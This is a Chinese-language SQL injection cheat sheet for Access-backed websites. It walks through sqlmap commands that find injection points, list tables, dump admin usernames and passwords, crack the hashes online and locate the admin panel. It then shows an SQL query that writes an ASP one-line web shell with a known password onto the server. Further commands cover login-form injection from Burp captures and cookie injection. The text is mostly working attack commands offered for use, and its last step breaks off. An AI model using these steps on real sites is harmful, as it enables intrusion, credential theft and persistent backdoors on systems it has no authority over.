##access数据库+sqlmap指令 ###get类型注入 1.检测是否存在注入点:'
、and 1=1
、and 1=2
、 2.使用sqlmap进行检测注入点是否可用
3.完整的access+sqlmap注入指令
一个完整的access注入过程命令 (1)注入点判断:sqlmap.py-u http://www.antian365.com/index.asp?id=1 (2)猜数据库表:sqlmap.py -u http://www.antian365.com/index.asp?id=1 –tables 输入线程:10,回车后开始跑表,找到合适的表后,按下ctrl+c终止跑表。 (3)对某个表进行字段猜解 sqlmap.py-u ” http://www.antian365.com/index.asp?id=1” –tables –columns -Tadmin 例如获取admin表的字段如下: id,username,password (4)对admin表字段内容进行猜解 sqlmap.py -u " http://www.antian365.com/index.asp?id=1"--dump -T admin -C "username,password" (5)获取明文密码或者加密密码。通过cmd5.com等在线网站进行明文密码破解。 (6)寻找后台地址,并登录后台 (7)通过后台管理寻求可以获取webshell的功能模块,尝试获取webshell。 知道web真实路径,且可以通过脚本执行查询,则可以通过查询来获取webshell,例如网站真实路径:d:\freehost\fred200903\web\,则查询语句为: SELECT '<%execute request("a")%>' into [a] in ' d:\freehost\fred200903\web\x.asp;a.xls''excel 8.0;' from a Shell地址:http://www.somesite.com/ x.asp;a.xls,一句话后门密码a。
###POST类型注入:
1.Accesspost登录框注入 注入点:http://xxx.xxx.com/Login.asp (1)通过burpsurte抓包保存为txt文件,使用sqlmap进行自动注入 例如对着注入点使用burp抓包,保存tg .txt文件,使用命令: ./sqlmap.py-r tg.txt -p tfUPass (2)自动搜索表单的方式 sqlmap-u http://xxx.xxx.com/Login.asp –forms (3)指定一个参数的方法 sqlmap-u http://xxx.xxx.com/Login.asp --data "tfUName=1&tfUPass=1" 2.Cookie注入 sqlmap -u "http://www.xxx.com/news.asp"--cookie "id=1" --table --level 2
1.sqlmap -r test.txt 判断是否存在注入点,test.txt中对注入点记得加个*号来做一下标记 2.